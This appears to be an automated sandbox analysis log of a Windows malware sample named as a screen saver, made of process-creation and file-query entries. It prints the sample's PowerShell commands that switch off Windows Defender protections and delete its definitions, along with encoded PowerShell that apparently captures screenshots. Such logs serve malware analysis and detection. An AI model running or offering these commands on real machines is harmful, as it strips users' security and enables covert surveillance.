bjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7ECB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

68_2_00007FF7F7ECB340

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE39E40 cpuid

0_2_00007FF73AE39E40

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
